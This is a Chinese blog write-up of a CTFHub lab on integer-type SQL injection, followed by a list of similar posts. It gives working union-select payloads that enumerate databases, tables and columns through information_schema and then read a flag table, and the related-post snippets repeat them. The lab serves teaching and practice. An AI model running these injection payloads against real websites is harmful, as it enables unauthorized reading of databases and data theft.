【ctfhub】SQL注入整数型注入

最新推荐文章于 2024-09-15 08:58:32 发布

原创最新推荐文章于 2024-09-15 08:58:32 发布 · 284 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库

ctf 专栏收录该内容

19 篇文章

订阅专栏

本文详细介绍了一种通过SQL注入获取敏感信息的方法。从初步判断到逐步深入，利用联合查询技巧获取数据库名称、表名称及列名称，并最终成功读取flag表中的flag字段。

题目描述

在这里插入图片描述输个1试试

我们先判断查询返回了多少列

在这里插入图片描述可以确定返回2列
接下来我们按照顺序联合查询库名、表名、列名
联合查询库名

-1 union select 1,group_concat(schema_name) from information_schema.schemata

在这里插入图片描述
我们猜测再sqli库中，接下来联合查询表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

在这里插入图片描述
显然肯定在flag表中，接下来我们联合查询列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'

在这里插入图片描述最后我们查询flag表下的flag字段

-1 union select 1,group_concat(flag) from flag

在这里插入图片描述成功得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

studyovo_Hz

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTFHub SQL 整数型注入

weixin_44732566的博客

02-16

3658

CTFHub SQL 整数型注入之前那道整数型注入题改了，，，但还是一样的套路，数据库也一样，就多了一个：前端页面回显位置只有两处，而且一个正确的id回显就占了两处地方 UI界面好看了，还多了一个问题，就是前端页面一次只显示一条数据库记录所以在payload最后加上limit x offset y 这个意思是从第y条记录开始后x条记录，y是从0开始算的 1 or 1=1 limit 1 o...

CTFHub~SQL注入【整数型+数字型+报错型注入】

weixin_67832625的博客

08-15

770

本文介绍了对CTFHub靶场中SQL注入中整数型+数字型+报错型注入的详细讲解

参与评论您还未登录，请先登录后发表或查看评论

ctfhub SQL 整数型注入

qq_52671379的博客

06-21

467

SQL 整数型注入题目当输入值为1或2时有回显当输入3时无回显判断是否存在注入加单引号对应的id=3’ 这时sql语句出错，程序无法正常从数据库中查询出数据，无回显。作为sql注入的小白，我决定不采用大佬们的方法，看不懂，先分享自己的方法，非常传统。由以上得知有两个字段，所以第一步，爆库名； '' union select 1,database() # 第二，爆表名； '' union select 1,group_concat(table_name) from information_

CTFHub-sql注入-整数型注入

qq_54537919的博客

07-22

1060

CTFHub-sql注入-整数型注入

CTFHub:web前置技能-SQL注入-整数型注入

wdnmddbl的博客

06-08

1196

路漫漫其修远兮，吾将上下而求索。本文涉及以下知识点，去引用文章学习即可：链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点，希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程：#，–+，-- -代表后边忽略，常用与闭合思路：sql注入之数字型注入点：许多网页链接有类似的结构。

CTFHub技能树-SQL注入-整数型注入

最新发布

m0_74313947的博客

09-15

965

思路：注入点->库->表->列->数据首先使用order by探测有几列我们发现order by 2 的时候有回显，到了order by 3 的时候就没有回显了，所以列数为2然后使用联合注入得到用户名与数据库名。

CTFHub_SQL整数型注入(超详解)

weixin_47443077的博客

07-26

1440

CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入！首先打开环境先尝试手注，已经说明是整数型，就直接查看字段数： -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显，说明字段数是2。接着判断显示位： -1 union select 1,2# 然后查看数据库： -1 union select database(),2# 接着获取sqli数据库中的表： -1 union select 1,grou

【ctfhub】SQL注入字符型注入

manerzi的博客

10-05

498

SQL注入字符型注入

CTFHub SQL技能树-整数形注入-字符型注入-报错注入-布尔盲注-时间盲注

Senimo

03-24

1933

整数型注入首先输入1查看回显：可以看到返回了SQL语句及ID和Data数据，查看列数： 1 order by 2 # 当列数为2时回显正常，接着判断回显位： 1111 union select 11,22 # 可以判断出回显点位如上，查看当前数据库版本及数据库名： 1111 union select version(),database() # 查询到当前数据库名为：sqli，...

CTFHUB-技能树-WEB-SQL注入

慢就是快

04-16

655

文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置，id=-1是为了将显示位置腾空，方便回显数据显示 id=-1 union select 1,group_concat(s

Ctfhub-sql注入【整数型】

soysauce123的博客

08-03

1099

这样我们就很清楚一个库的库名，表名和字段名就可以直接查找里面的数据。先尝试看看一共有几列，当道三的时候发现不返回了说明只有两列。发现有老多库了，我们就大胆猜测从我们本来就在的库里面查找。于是使用函数获得此表里面的带有flag的字段名。小白承认这题对于我来说是一个练手的题目【嘿嘿】身为一名小白我们先预习一下今天要用到的知识。接下来就可以查询一下我们现在在什么库。我们肯定要的是flag里面的数据对吧。然后我们就可以输入flag通过本题啦。然后我们再尝试看看一共有什么库用到。欸，发现我们在sqli里面。.....

ctfhub Sql整数型注入

m0_64078007的博客

03-11

322

我们打开文件发现了它提示我们输入一个“1”，我们尝试输入。我们发现它可以有回显，根据它的提示我们尝试整数的注入类型。 select * from news where id = 1 and 1=1 select * from news where id = 1 and 1=2 当我们尝试到第三个时，它爆字段了。 ...

ctfhub之SQL整数型注入（借助sqlmap工具）

hwy2506451901的博客

04-05

1120

关于这道题呢，我还没有看到用sqlmap工具解答的，正好刚刚做完，感觉还挺简单的，所以决定分享一下过程，大佬可以绕过啦嘿嘿嘿，大家也可以去下载一个试试这个工具，希望能有一点帮助吧！我们启动环境，进入网址看到让我们输入一个1试试，那我们就输入试试吧可以看到我们输入的id写在了地址栏当中，说明采用的提交方式是get,下面就详细介绍这道题采用sqlmap的解法： 1.检查是否存在漏洞：将地址栏的...

CTFHUB-SQL注入-整数型注入

weixin_68416970的博客

06-07

820

根据题目描述输入 1 进行测试，发现此题可能存在 SQL 注入漏洞。使用 id=1' and 1 = 1 和 id=1' and 1 = 2’进行判断，此题存在 SQL 整数型漏洞注入。然后第一步先判断字段数量，然后查看数据库名，接着查看全部数据库名，查看这些数据库的表名，发现一个表名为 flag。查看这个表的全部字段后接着查看表中的数据得到此题 flag。

CTFHub-web(SQL整数型注入)

分享与记录

03-26

444

上题按照提示输入1 尝试知道有几个字段，先传入1 order by 2，回显正常然后1 order by 3，根据回显可得知只有两个字段找注入点得知1，2均为注入点知道了当前数据库名，便可查询出表名 0 union select 1,group_concat(table_name) from information_schema.tables where table_sche...

CTFHub 整数型SQL注入

Leon~博客

03-08

5881

1、整数型SQL注入（1）判断是否存在注入 1）加单引号 URL：http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql：select * from table where id=3’ 这时sql语句出错，程序无法正常从数据库中查询出数据，就会抛出异常； 2）加and 1=1 URL：http:...

ctfhub-SQL注入-SQL整数型注入

qq_46222050的博客

09-01

825

做这个题目前，建议去B站看一下SQL注入的视频，挺基础的，也有了解。 2020最新Java老王带你了解SQL注入（配套源码+笔记）关键字/语句/函数解释 union select 联合查询，联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如：mysql 1.2.3， mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接，形成一个字符串 information_schema 存了很多

CTFHub SQL 整数型注入[四步]

luminous_you的博客

12-04

531

判断列数 1 order by 2 判断回显点 1 union select 1,2 判断表名列名 -1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database() 得出结果【两种方法】 -1 union select 1,flag from sqli.flag limit 0,1 -1 union select 1,(se

CTFHUB - SQL注入-整数型和字符型注入

m0_64180167的博客

11-28

2990

对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。，在管理员不知情的情况下实现非法操作，以此来实现欺骗。执行非授权的任意查询，从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。

ctfhub sql注入

10-09

CTFHub是一个CTF（Capture The Flag）竞赛平台，其中包含了各种类型的安全挑战，包括SQL注入。SQL注入是一种常见的Web应用程序安全漏洞，攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...